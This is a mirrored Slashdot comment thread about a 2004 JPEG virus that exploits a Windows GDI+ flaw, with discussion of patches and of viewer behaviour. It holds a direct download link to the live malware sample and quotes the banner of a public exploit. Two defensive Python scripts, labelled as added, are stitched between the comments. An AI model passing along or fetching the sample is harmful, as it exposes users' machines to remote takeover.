Slashdot Mirror


First JPEG Virus Posted To Usenet

Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."

165 of 694 comments

  1. Anyone have a working copy? by tuxedobob · · Score: 2, Interesting

    I want to see what GraphicConverter does with this.

    1. Re:Anyone have a working copy? by JS_RIDDLER · · Score: 5, Informative

      In the article the virus.txt has a jpeg sample in code.

      --
      _JS
    2. Re:Anyone have a working copy? by tuxedobob · · Score: 3, Funny

      Don't want sample code. Want JPEG.

    3. Re:Anyone have a working copy? by Anonymous Coward · · Score: 5, Informative

      http://easynews.com/test/possiblevirus.jpg.gz

      Got the link from bugtraq a few hours ago.

    4. Re:Anyone have a working copy? by Anonymous+Freak · · Score: 5, Informative

      Well, Apple's Preview (as of 10.3.5 with all the latest updates as of 6:00 PM PDT, 9/27/04,) says it's not a supported file type.

      Graphic Converter complains that "Some parts of the file may be missing."

      Safari displays a blank page, with no errors.

      In all cases, I can't find any file-system goofiness. (And the free-with-DotMac Virex doesn't detect it as a virus.)

      (The offending "virus" is available as a linked-to zip file in the linked virus.txt page.)

      --
      Another non-functioning site was "uncertainty.microsoft.com."
      The purpose of that site was not known.
    5. Re:Anyone have a working copy? by Tyrdium · · Score: 4, Informative

      Heh, Norton Antivirus wouldn't even let me try it. The heuristics grabbed it before it was even on my desktop. Now [i]that[/i] is impressive.

    6. Re:Anyone have a working copy? by Ariane+6 · · Score: 2, Interesting

      I just downloaded the sample from easynews.

      Quit all internet apps, and watched my network traffic with Activity Monitor.

      Graphic Converter gave its standard "An error occurred while decoding the image. Some parts of the picture may be missing." Message, then displayed a blank white image (555x857)

      No spike in network activity at all, as one would expect.

      (I love my Mac)

    7. Re:Anyone have a working copy? by Yaztromo · · Score: 4, Interesting
      I want to see what GraphicConverter does with this.

      Absolutely nothing. The file is only 8KB in size, and doesn't appear to contain any actual image data. Loading it up in GraphicConverter v4.9 over here (and Preview, and a number of other tools) just reports that the image file is corrupt.

      Yaz.

    8. Re:Anyone have a working copy? by tuxedobob · · Score: 3, Funny

      Thanks! Downloaded and opened!

    9. Re:Anyone have a working copy? by rainman_bc · · Score: 4, Funny

      Mine too... Totally impressive. What's even more impressive is the ability to use standard html tags on slashdot :)

      --
      09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
    10. Re:Anyone have a working copy? by Three+Headed+Man · · Score: 5, Funny

      I extracted the bad code, but I'm having trouble getting it to run in WINE.

      Just one more reason Linux isn't ready for the desktop.

      --
      I'm probably at the karma cap. Mod up a funny troll instead, it lightens the mood :)
    11. Re:Anyone have a working copy? by Ariane+6 · · Score: 2, Interesting

      If you think you are safe you are misleading yourself

      I am well aware that I am not ENTIRELY safe, however, one of the upsides to using a platform with low marketshare is that the authors of malware (as exemplified by this and the vast majority of other virii) tend to pay it little attention.

      Matter of fact, most macs that you can gain local access to are easily rooted through apple tools.

      You mean single-user mode? I've used that before. I don't think anyone with local access to my machine gives a shit, though; it's in my bedroom. I suppose that if a cracker is enterprising enough to break into my house and root my machine locally, well...fair play to them :)

    12. Re:Anyone have a working copy? by Ravadill · · Score: 2, Informative

      As of writing the latest clamAV (windows ver) with latest virus DB does NOT find this.

    13. Re:Anyone have a working copy? by boisepunk · · Score: 3, Informative

      GIMP under Win32 gives error "Improper call to JPEG library in state 201".

      I'm not going to try it under internet exploiter or mspaint. ...just trying to be informative

      --
      main(0)
    14. Re:Anyone have a working copy? by HermanAB · · Score: 4, Funny
      Yah, Linux is boring - it just works...

      Windows Users have all the fun!

      --
      Oh well, what the hell...
    15. Re:Anyone have a working copy? by tonyr60 · · Score: 2, Funny

      "I don't think anyone with local access to my machine gives a shit, though; it's in my bedroom. I suppose that if a cracker is enterprising enough to break into my house and root my machine locally, well...fair play to them :)"

      Hey, come on. Root my wife, partner or whatever. No problem there. But definitely not my machine, particularly in my bedroom....

    16. Re:Anyone have a working copy? by Paul+d'Aoust · · Score: 4, Informative

      In all seriousness, I downloaded an example of an Evil JPEG to my Linux computer and tried opening it up in various programs.

      • Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
      • Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
      • Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
      • Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background

      So, after five minutes of extremely unprofessional research and wild conjectures, I'd say it looks like the stories are true: some Linux programs may be vulnerable too. Yikes!

      mind you, who would ever write an exploit that would only spread to five percent of the computers in the world? ;-)

      --
      Standing at the very edge of my imagination, I peered into the inky void and realised -- I couldn't think up a new sig.
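Several posters above report that their viewers reject the file as corrupt or "missing parts" before any decoding happens. The check a hardened decoder performs at that point is simple: walk the JPEG marker segments and refuse any segment whose declared length is impossible. The following is an added example written for this thread, not code from the original post, from GDI+ or from any viewer named above; the JPEG byte strings at the bottom are constructed here, not the Usenet sample.

```python
"""Defensive JPEG marker-segment validation.

Added example for this thread; it is not code from the original post, from
GDI+, or from any of the viewers named above. It walks the marker segments at
the start of a JPEG and rejects any segment whose declared length is
impossible: shorter than the 2-byte length field itself (a decoder that
subtracts 2 before copying would then compute a huge or negative size) or
running past the end of the file. The sample inputs at the bottom are
constructed here, not taken from the Usenet posting.
"""
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# TEM and RST0..RST7 are standalone markers that carry no length field.
STANDALONE = {0x01} | set(range(0xD0, 0xD8))


def walk_segments(data: bytes):
    """Yield (marker, payload_offset, payload_length) for every segment from SOI
    up to and including SOS. Raises ValueError on the first structural defect."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        raise ValueError("missing SOI marker")
    pos = 2
    while True:
        if pos + 2 > len(data):
            raise ValueError("truncated: end of data before EOI or SOS")
        if data[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:          # fill byte: skip one 0xFF and re-read
            pos += 1
            continue
        pos += 2
        if marker == EOI:
            return
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            raise ValueError(f"marker 0x{marker:02X} has no length field")
        (length,) = struct.unpack_from(">H", data, pos)
        if length < 2:
            raise ValueError(
                f"marker 0x{marker:02X} at offset {pos - 2}: length {length} < 2 "
                "(would underflow a 'length - 2' payload size)")
        if pos + length > len(data):
            raise ValueError(
                f"marker 0x{marker:02X} at offset {pos - 2}: length {length} "
                f"runs past end of file ({len(data)} bytes)")
        yield marker, pos + 2, length - 2
        pos += length
        if marker == SOS:
            return  # entropy-coded scan data follows; not walked here


def is_well_formed(data: bytes):
    """Return (True, summary) if all header segments validate, else (False, reason)."""
    try:
        segments = list(walk_segments(data))
    except ValueError as exc:
        return False, str(exc)
    return True, f"{len(segments)} segment(s) ok"


# Constructed samples (not the file from the thread).
# SOI, APP0/JFIF (length 16), COM "hello" (length 7), EOI.
GOOD = (b"\xFF\xD8"
        + b"\xFF\xE0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
        + b"\xFF\xFE" + struct.pack(">H", 7) + b"hello"
        + b"\xFF\xD9")
# COM segment whose length field says 1: impossible, since the field itself is 2 bytes.
SHORT_LENGTH = b"\xFF\xD8" + b"\xFF\xFE" + struct.pack(">H", 1) + b"\xFF\xD9"
# COM segment claiming 100 bytes in a file that ends after 3.
OVERRUN = b"\xFF\xD8" + b"\xFF\xFE" + struct.pack(">H", 100) + b"abc"

if __name__ == "__main__":
    for name, sample in ("GOOD", GOOD), ("SHORT_LENGTH", SHORT_LENGTH), ("OVERRUN", OVERRUN):
        ok, why = is_well_formed(sample)
        print(f"{name:13s} {'accept' if ok else 'reject'}: {why}")
```

The walker stops at SOS, so it only covers the header segments; a full decoder still has to bound-check Huffman tables, component counts and the scan data itself. The point is that length fields are attacker-controlled integers and must be validated before any arithmetic is done on them.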
    17. Re:Anyone have a working copy? by Gogo+Dodo · · Score: 2, Interesting
      Did NAV detect it as Bloodhound.Exploit.13?

      What I find interesting is the next one in sequence, Bloodhound.Exploit.14. Looks like IE has problems parsing TIFFs, too. First time I've heard of this. Apparently, Microsoft hasn't acknowledged this one as there's no link on the Symantec site for further details like they do with all the previous ones in the Bloodhound.Exploit series.

    18. Re:Anyone have a working copy? by Jussi+K.+Kojootti · · Score: 2, Informative

      TIFF supports using different compressions including jpeg (not all programs accept unusual choices though). That could be the reason.

    19. Re:Anyone have a working copy? by Anonymous Coward · · Score: 4, Funny

      Yeah but Linux users make up 90% of the porn-downloading population; therefore, there is an elevated risk.

    20. Re:Anyone have a working copy? by Gogo+Dodo · · Score: 2, Informative

      I found this on SecurityFocus: Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability. Looks like Symantec is proactive, but then that is what their Bloodhound stuff is for.

    21. Re:Anyone have a working copy? by famebait · · Score: 3, Interesting

      So, after five minutes of extremely unprofessional research and wild conjectures, I'd say it looks like the stories are true: some Linux programs may be vulnerable too. Yikes!

      I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.

      UNIX generally has separate code and data segments, and with modern CPUs with memory management the OS should be able to enforce the separation very strictly. Doesn't Linux do this?

      It has long been a mystery to me why Windows did not (up until XP SP2). Whole classes of overflow exploits and system threats from bugs are just not possible if you can't execute code that's not explicitly loaded into executable segments, and if normal data-writes simply don't have write access to executable memory.

      --
      sudo ergo sum
    22. Re:Anyone have a working copy? by Anonymous Coward · · Score: 2, Insightful

      Thing is, without NX x86 processors have no way of marking pages as non-executable. Not even on linux.

    23. Re:Anyone have a working copy? by ajs · · Score: 3, Interesting

      I don't know much of Linux internals, but I don't think it is obvious that it is vulnerable just because programs can get confused by unexpected data.

      Simple answer: no, and that's why buffer overflow attacks work.

      Yeah, I've been waiting for years to hear about the first image-based attacks for Linux. I was kind of surprised that the first exploits arrived for Windows instead of Linux, just because we've known about several holes in Linux over the years (look at the changelog for any image processing library). The down-side is that you can't always "root the box" based on an image attack because a user will be running the browser, but I would think that access to the machine is enough for most zombification and you can always go after local exploits to get root at that point.

      Linux needs a good suite of exploitive data (that doesn't do anything) for projects to test against. Perhaps I'll work on that in my spare time (every format and protocol has many spots where it would be easy for a lazy programmer to do static allocation and then fail to bounds-check, so you just write code/generate data that exploits each one of these places). I've done this for specific proprietary applications before.

    24. Re:Anyone have a working copy? by marklark · · Score: 2, Informative


      Hmmm... Perhaps you need to update your Virex.

      Mine, v7.5, did find it and offer to clean it.

      $0.02

    25. Re:Anyone have a working copy? by The_ForeignEye · · Score: 2, Funny

      He was not joking. ...and don't call him surely.

  2. Goatse by paughsw · · Score: 2, Funny

    One more reason not to look at that goatse picture!

    1. Re:Goatse by Molina+the+Bofh · · Score: 3, Funny

      It'll leave your backdoor wide open.

      --
      Roses are #FF0000, Violets are #0000FF, find / -name '*base*' |xargs chown -R us && mv zig greatjustice
    2. Re:Goatse by devilspgd · · Score: 3, Funny

      If the editors can dupe, why not the posters?

      --
      Give a man a fish, he'll eat for a day, but teach a man to phish...
    3. Re:Goatse by NanoGator · · Score: 2, Funny

      ...If the editors can dupe, why not the posters?

      --
      "Derp de derp."
  3. That's pretty amazing. by autopr0n · · Score: 3, Funny

    Congrats, microsoft, for making just about every filetype unsafe.

    The worst part is that you don't even need to be using IE. Hopefully mozilla decodes the jpgs itself before rendering them on windows.

    --
    autopr0n is like, down and stuff.
    1. Re:That's pretty amazing. by FooAtWFU · · Score: 3, Informative

      Any recent version certainly does so.

      --
      The World Wide Web is dying. Soon, we shall have only the Internet.
    2. Re:That's pretty amazing. by mini+me · · Score: 5, Informative

      Hopefully mozilla decodes the jpgs itself before rendering them on windows.

      It does. But Mozilla had almost the exact same problem with both BMP and PNG in the last week or two. So it's not just Microsoft who has vulnerable image decoders.

    3. Re:That's pretty amazing. by ConceptJunkie · · Score: 4, Insightful

      This reminds me of my first thought when I saw Windows 95 message "It is now safe to turn off your computer."

      Which was, "However it is no longer safe to turn on your computer."

      Quality freefall.

      Really, how much new useful functionality has MS provided in the last 5 years? It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory. Functionality increases at best in a linear fashion, while system requirements increase at a geometric rate. Software eats more of your computer and offers less in return.

      Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurrence of gaping new exploits increased significantly.

      Maybe they should shut down for a year. Take all the gigabyte-gobbling shit they've written for the last 10 years and turn it into useful code with no new functionality. Returning with the same stuff they have now, but with little or no security issues would win them more customers than their current monopolistic policies and FUD spreading ever will.

      Really, what else could they possibly do besides introduce a bunch of bloated new technologies for doing the same damn thing we all wrote for ourselves years ago, but without all the MS lock in and huge learning curve?

      I have to ask, what has MS done that is actually useful since Windows 2000?

      --
      You are in a maze of twisty little passages, all alike.
    4. Re:That's pretty amazing. by datawar · · Score: 5, Informative

      Are you serious? Of course Slashdot covered those stories too.

      Critical Mozilla, Thunderbird Vulnerabilities

      CERT Warns Of Multiple Vulnerabilities In Libpng

    5. Re:That's pretty amazing. by craXORjack · · Score: 4, Insightful
      It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory.

      I'm glad I'm not the only one who noticed this. btw CPUs are way faster than 10x faster. In 1994 I could only afford a 386sx at 16MHz. Not only is the clock speed faster but the chip has gone through several major revisions. Yet I think that 386sx booted up faster and ran Lotus and Wordperfect under DOS just as fast as anything out there on Windows today. Of course there are some advantages to windows but speed sure isn't one of them!

      --
      Liberals call everyone Nazis yet they are the closest thing to it.
    6. Re:That's pretty amazing. by joelanders · · Score: 2, Funny

      I always thought I could avoid viruses by looking at pr0n instead of....

    7. Re:That's pretty amazing. by ConceptJunkie · · Score: 4, Interesting

      The real kicker was when I switched to Outlook 2003 from Outlook Express. From a usability point of view, it was a pretty good improvement, especially the spam handling, but with a fairly large message store, it took at least an order of magnitude longer to access folders, etc, in O2k3 than OE. It was absurd. Oh, yeah, and the fact that an O2k3 data store can't be bigger than about 1GB to 1.5GB before it starts losing messages (I couldn't believe this at first but it was confirmed by two people with much more MS experience than me). I switched to Thunderbird around 0.5 and haven't given it a second thought.

      Now here's a case where the MS software really was well-designed and easy to use (from a UI standpoint), but the grotesque slowness of the app killed it for me.

      In 1994, I had a 50MHz 486SX... I didn't buy a Pentium 100 until '96, so you're right. Clock speed is more like 40 - 60 times faster (and thanks to wonders of CISC, performance is more than that). And disk space has increased for me by 3 orders of magnitude.

      I seem to recall MicroCenter or CompUSA having a "Buck-a-Meg" sale and I bought a 340MB drive for $340, bringing my total to a whopping 580MB. Now I've got about 600GB over about 4 machines, maybe more since each box is crammed full of old drives ranging from 7GB to 250GB etc in addition to a few bigger drives.

      I used to hate how my Amiga took like 3 minutes to boot back in the late 80's. Windows 2000 on a machine that was 100 times faster took around the same time. XP is much better, but still, there are times when I have a lot of apps loaded and it just seems to go out to lunch for several seconds before anything responds. And don't get me started on the launch time for Word 2003...

      --
      You are in a maze of twisty little passages, all alike.
    8. Re:That's pretty amazing. by madmancarman · · Score: 2, Funny
      I have to ask, what has MS done that is actually useful since Windows 2000?

      They killed Clippy.

      --
      First they ignore you, then they laugh at you, then they fight you, then you win. -- Gandhi
    9. Re:That's pretty amazing. by Doyle · · Score: 5, Funny

      I have to ask, what has MS done that is actually useful since Windows 2000?

      You mean, apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health?

      Oh, wait - that was the Romans :P

    10. Re:That's pretty amazing. by HermanAB · · Score: 3, Funny

      No dammit, if MS fix their code it will kill the PC support industry and another million wannabe geeks will be out of work...

      --
      Oh well, what the hell...
    11. Re:That's pretty amazing. by ConceptJunkie · · Score: 3, Funny

      What has Open Source done in the last 4 years?

      Gone from Linux 2.0 to Linux 2.4 with all the huge improvements that go with it.

      Built a world-class browser from scratch. Ditto for e-mail.

      Developed half the apps I use under Windows.

      (And while I like the Windows development platform, ironically, I still use VC++ 6 because that's what all my clients use and want.)

      What have other large companies done in the past 4 years?

      Sun: Got in a pissing match with MS over Java. Won, or lost... heck I don't even know (or care).

      Oracle: Continues to resent losing a competitive pissing match with MS despite having a superior product

      Corel: Tried to enter a pissing match with MS with 1/100th of the resources... failed miserably and sold everything

      Apple: Continued their pissing match with MS over usability (and is still losing the war despite winning all the battles)

      IBM: Set themselves up for a pissing match with MS by backing Linux.

      SCO: Pissed off everyone.

      Enron: Pissed on everyone.

      Novell: Pissed themselves.

      --
      You are in a maze of twisty little passages, all alike.
    12. Re:That's pretty amazing. by Anonymous Coward · · Score: 2, Informative

      Known vulnerabilities in Mozilla.

      These would be numbers 83 and 89 on that list.

    13. Re:That's pretty amazing. by NanoGator · · Score: 2, Informative

      "I have to ask, what has MS done that is actually useful since Windows 2000?"

      The image viewer that comes with XP is very nice. (Especially for us pr0n freaks.) You can log in as another user without logging out the previous user. (We use that at work fairly frequently.) CD burning is built in to explorer. Startup and shutdown are considerably faster. You can actually lock the taskbar, although MS should have added that when they first put it in. I've noticed fewer restarts after installing some stuff, but it's been a long time since I've done that so I can't be more specific. Etc etc etc.

      To sum it up: I have a 2k workstation at home and an XP workstation at work, and boy do I feel the difference. I can still do my work just fine on 2K (i.e. I'm not exactly running out and buying the upgrade) but I am glad I have it at work and on my laptop. XP isn't total garbage compared to 2K.

      --
      "Derp de derp."
    14. Re:That's pretty amazing. by IchBinEinPenguin · · Score: 5, Informative

      Returning with the same stuff they have now, but with little or no security issues

      Sorry, that won't work.

      Some of the stuff is insecure by design! Not "designed to be insecure", just "impossible to secure given the design".

      Take ActiveX: running binary code downloaded from anywhere without a JVM-like sandbox is insecure. No matter how many digital signatures, OK dialog boxes and warning messages you add, some (most?) users WILL simply click through all the warnings and have their boxes 0wn3d.

      Design has tradeoffs between security, performance, usability etc. etc. Some of this stuff you can't fix without changing the basic design (i.e. starting from scratch)

    15. Re:That's pretty amazing. by bitflip · · Score: 2, Insightful

      Apparently, the Outlook interface was useful enough that Evolution 2.0 copied it.

    16. Re:That's pretty amazing. by Tony-A · · Score: 4, Insightful

      "It is now safe to turn off your computer." ... Quality freefall.

      It's related.
      There is an arrogance that Microsoft knows best that is implicit in that statement. Whether or not it is actually safe to turn off the computer is very much outside of Microsoft's knowledge. In fact the safest thing to do when a system is acting bonkers is to hit reset or the power switch on old computers, or pull the power plug or remove the battery on new computers where the power switch is no longer functional. The reasoning goes that when the system has its brains scrambled it desperately wants to write those scrambled brains to disk and thus perpetuate the scramble.

      Remember when MS supposedly shut down for a month to work on security issues? That was about 4 years ago. Not only did the problems not go away, but the occurrence of gaping new exploits increased significantly.

      One whole month. Well golly gee! Actually one month would be enough to stop hiding stuff and never under any circumstance use or require scripts or ActiveX controls for anything remotely related to security.
      [x] Hide files extension for known file types.
      That by itself is enough to wreck any attempts at achieving security. The message is loud and clear. Linux worms never seem to get anywhere. People see them and react violently to anything sneaking around trying to be invisible.

      Task Manager doesn't show everything. Microsoft Windows comes with a pre-installed root kit!

    17. Re:That's pretty amazing. by spectrokid · · Score: 2, Funny

      Hey, they even managed to make vCard unsafe at one point, and that is a fucking TEXT file!!!

      --
      10 ?"Hello World" life was simple then

    18. Re:That's pretty amazing. by spectecjr · · Score: 2, Informative

      From a usability point of view, it was a pretty good improvement, especially the spam handling, but with a fairly large message store, it took at least an order of magnitude longer to access folders, etc, in O2k3 than OE.

      The first time you open the folder, it takes time to index it. After it completes indexing, it's much faster. If you don't allow the system to complete indexing before navigating away from a folder, it'll need to do it again next time you open the folder.

      If you don't want to take the time, instead of opening existing PST files in Outlook, create a new one and import the contents of the older one into it - which will do the indexing for you.

      After it has finished indexing, it's as fast - or sometimes even faster - as previous versions.

      --
      Coming soon - pyrogyra
    19. Re:That's pretty amazing. by mlush · · Score: 2, Funny
      It takes just as long to load apps now as it did 10 years ago, even though machines are 10 times faster with 100 times more memory

      That's Gates' Law: Every 18 months the speed of software halves.

    20. Re:That's pretty amazing. by MikeDX · · Score: 2, Funny

      Winxp is chugging down at least a gig and a half, and really doesn't offer me much more than nt4 did.

      What?? Are you trying to tell us that the nice rounded safe buttons, pretty green wallpaper and network killing security issues aren't worth the $150 price tag?? Surely you jest!
      To me, when I think Microsoft, I think "Small Software", ah, so much for so little, what a happy family we are!

  4. Just begging to be sued by TheSpoom · · Score: 4, Interesting
    printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
    printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n");
    printf(" | September, 23, 2004 |\n");
    Geez, this guy really wants to be sued and/or arrested.
    --
    It's better to vote for what you want and not get it than to vote for what you don't want and get it.
    - E. Debs
    1. Re:Just begging to be sued by Anonymous+Freak · · Score: 4, Informative

      This is the guy who published the "proof of concept" exploit, not the virus that is in the wild. He is as likely to be sued as "DVD Jon" would be sued for breaking CSS. Oh, wait.....

      --
      Another non-functioning site was "uncertainty.microsoft.com."
      The purpose of that site was not known.
    2. Re:Just begging to be sued by d_jedi · · Score: 4, Funny

      I got my lawyer on the phone, but he couldn't look up any legal info.. seems he was viewing some p[r]on, and all of the sudden, his computer stopped working..

      Damn Jay Peg with his viruses..

      --
      I am the maverick of Slashdot
    3. Re:Just begging to be sued by lukewarmfusion · · Score: 4, Insightful

      "Can't arrest someone for merely writing a piece of code."

      coughcoughpatriotactcoughcough

    4. Re:Just begging to be sued by BiggerIsBetter · · Score: 2, Insightful

      ...in JAPAN! But in the US, you probably can be.

      --
      Forget thrust, drag, lift and weight. Airplanes fly because of money.
    5. Re:Just begging to be sued by thogard · · Score: 2, Funny

      So is Billy G an ass for giving the script kiddies something easy to use too?

    6. Re:Just begging to be sued by toetagger1 · · Score: 5, Informative

      Google finds a whole lot of exploits for this guy, ranging from apache to AIM away message buffer overruns.

      --
      who | grep -i blond | date cd ~; unzip; touch; strip; finger; mount; gasp; yes; uptime; umount; sleep
  5. Can be prevented... by pbranes · · Score: 4, Informative

    Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.

    1. Re:Can be prevented... by Zocalo · · Score: 5, Informative

      Yes it has. Unfortunately like many Microsoft patches it gives you a nice fuzzy sense of false security. According to Microsoft, I'm nice and safe, but according to Tom Liston's GDIScanner and a quick perusal of the file versions, I'm quite possibly not. Fortunately my virusscanner *does* seem to pick up on this, but that's no thanks to Microsoft.

      --
      UNIX? They're not even circumcised! Savages!
    2. Re:Can be prevented... by antifoidulus · · Score: 2, Funny

      SUSE is also free, and will solve the problem....:P
      Sorry, couldn't resist that one.

    3. Re:Can be prevented... by Saratoga+C++ · · Score: 5, Informative

      Sorry to burst your bubble dude, but that patch only fixed the system's instance of GDI+. There are a ton of apps that have their own version of GDI+ built on their own app path. Just because you use the patch, that doesn't mean that it's actually fixed.

      Say you're using app X that uses GDI+ to render its own image stuff (say it's a picture album maker). It keeps its own version of GDI+ that the developers extended for their own reasons. This GDI+ is vulnerable. After patching, this older version of GDI+ is still on your system so that app is vulnerable...

      So buyer beware.

    4. Re:Can be prevented... by EnronHaliburton2004 · · Score: 3, Interesting

      Since this virus also affects MS Office, I bet it may be propagated that way.

      Most people update their system via windowsupdate.microsoft.com . However, despite the rumors, Windowsupdate does NOT update your MS Office suite.

      Very few people go the extra step to use the MS office updater.

    5. Re:Can be prevented... by glob · · Score: 4, Informative

      > Sorry to burst your bubble dude, but that patch
      > only fixed the system's instance of GDI+

      while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

      --
      nostrils
    6. Re:Can be prevented... by dabug · · Score: 3, Informative

      From Tom Liston's site:

      "Ignore files in directories like Windows\$NtUninstallKBxxxxx\ and Windows\WinSxS. These are old versions left behind for uninstall purposes."

    7. Re:Can be prevented... by Anonymous Coward · · Score: 5, Informative

      while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

      Another bubble bites the dust! It detects, but does not fix the problem. Nor does it even tell you where the problem is. This was covered earlier today.

    8. Re:Can be prevented... by stemcell · · Score: 2, Funny

      Say you're using app X that uses GDI+ to render its

      Oh no, not X too.

      Stem

    9. Re:Can be prevented... by Zocalo · · Score: 4, Informative

      Not strictly true. "WinSxS" is short for "Windows Side-by-Side" which according to my research over the last few days is a horrible hack to try and allow different apps to use different versions of the same DLL on the same system. So, suppose we have three versions of the DLL; v1 and v2 are vulnerable, v3 is not. Windows comes with v2, but I install a graphics viewer that requires and installs v1 as part of its install - v1 goes into "WinSxS". When I install the MS patch, the vulnerable v2 version is replaced with the secure v3 and MS tells me all is well, but if I open a bad JPEG with my graphics viewer, it loads the v1 DLL and my PC belongs to someone else.

      --
      UNIX? They're not even circumcised! Savages!
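The practical consequence of the last few posts (application-private copies of GDI+, the detection tool that reports but does not fix, and the leftover copies in $NtUninstall... and WinSxS that Tom Liston says to ignore) is that an admin needs an inventory of every gdiplus.dll on the box together with its file version. The script below is an added example written for this thread; it is not Microsoft's GDI+ detection tool and not GDIScan. It reads the version straight out of the VS_FIXEDFILEINFO block of the PE version resource, prunes the leftover-copy directories, and flags copies older than a minimum fixed version. MIN_FIXED_VERSION is a placeholder (take the real number from the vendor advisory), and the demo tree with its fake DLL files and the "PhotoAlbumX" application name are constructed here.

```python
"""Inventory every copy of gdiplus.dll under a directory tree.

Added example for this thread; it is not Microsoft's GDI+ detection tool and
not Tom Liston's GDIScan. It walks a tree, skips the leftover-copy directories
named above ($NtUninstall... and WinSxS, per the quoted note), reads each
copy's file version from the VS_FIXEDFILEINFO block in the PE version resource,
and flags copies older than a minimum "fixed" version. MIN_FIXED_VERSION is a
placeholder: take the real number from the vendor advisory. The demo tree is
constructed here with fake DLL files that contain only a version block.
"""
import os
import shutil
import struct
import tempfile

VS_FIXEDFILEINFO_SIG = 0xFEEF04BD
SIG_BYTES = struct.pack("<I", VS_FIXEDFILEINFO_SIG)
# Directory-name prefixes holding old copies kept for uninstall only (case-insensitive).
SKIP_DIR_PREFIXES = ("$ntuninstall", "winsxs")
# PLACEHOLDER: substitute the patched gdiplus.dll version from the advisory.
MIN_FIXED_VERSION = (5, 1, 3000, 0)


def pe_file_version(data: bytes):
    """Return (major, minor, build, revision) from the first VS_FIXEDFILEINFO block
    (dwSignature, dwStrucVersion, dwFileVersionMS, dwFileVersionLS), or None."""
    idx = data.find(SIG_BYTES)
    if idx < 0 or idx + 16 > len(data):
        return None
    _sig, _struc, ms, ls = struct.unpack_from("<4I", data, idx)
    return (ms >> 16, ms & 0xFFFF, ls >> 16, ls & 0xFFFF)


def scan_for_dll(root, dll_name="gdiplus.dll", min_fixed=None, skip=SKIP_DIR_PREFIXES):
    """Return [{path, version, vulnerable}] for every dll_name under root.
    'vulnerable' is version < min_fixed, or None when either is unknown."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk never descends into the skipped directories.
        dirnames[:] = [d for d in dirnames if not d.lower().startswith(skip)]
        for fn in filenames:
            if fn.lower() != dll_name:
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                version = pe_file_version(fh.read())
            vulnerable = None if (min_fixed is None or version is None) else version < min_fixed
            found.append({"path": path, "version": version, "vulnerable": vulnerable})
    return sorted(found, key=lambda r: r["path"])


def write_fake_dll(path, version):
    """Write a stand-in 'DLL': an MZ stub plus a VS_FIXEDFILEINFO block (constructed)."""
    major, minor, build, rev = version
    block = struct.pack("<4I", VS_FIXEDFILEINFO_SIG, 0x00010000,
                        (major << 16) | minor, (build << 16) | rev)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(b"MZ" + b"\x00" * 62 + block)


def build_demo_tree(root):
    """Constructed layout: patched system copy, an app-private old copy, and
    two leftover copies in directories the scan is meant to skip."""
    write_fake_dll(os.path.join(root, "Windows", "system32", "gdiplus.dll"), (5, 1, 3000, 0))
    write_fake_dll(os.path.join(root, "Program Files", "PhotoAlbumX", "gdiplus.dll"), (5, 1, 2600, 0))
    write_fake_dll(os.path.join(root, "Windows", "WinSxS", "x86_gdiplus", "gdiplus.dll"), (5, 1, 2600, 0))
    write_fake_dll(os.path.join(root, "Windows", "$NtUninstallKB000000$", "gdiplus.dll"), (5, 1, 2600, 0))


def run_demo():
    """Build the demo tree in a temp dir, scan it, return (relative path, version, vulnerable)."""
    root = tempfile.mkdtemp(prefix="gdiscan_demo_")
    try:
        build_demo_tree(root)
        report = scan_for_dll(root, min_fixed=MIN_FIXED_VERSION)
    finally:
        shutil.rmtree(root)
    return [(os.path.relpath(r["path"], root).replace(os.sep, "/"), r["version"], r["vulnerable"])
            for r in report]


if __name__ == "__main__":
    for rel, ver, vuln in run_demo():
        status = {True: "OLDER than min fixed", False: "ok", None: "version unreadable"}[vuln]
        print(f"{rel:45s} {'.'.join(map(str, ver)) if ver else '?':16s} {status}")
```

Pruning `dirnames` in place is what keeps os.walk out of the WinSxS and $NtUninstall trees; drop that line if you want the leftover copies listed too. Note that the side-by-side copy Zocalo describes is exactly the kind the scan skips by default, so if an application manifest binds to a WinSxS version, check that assembly's version separately rather than relying on the system copy.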
  6. A new era of exploitation by SlashdotMirrorer · · Score: 2, Interesting

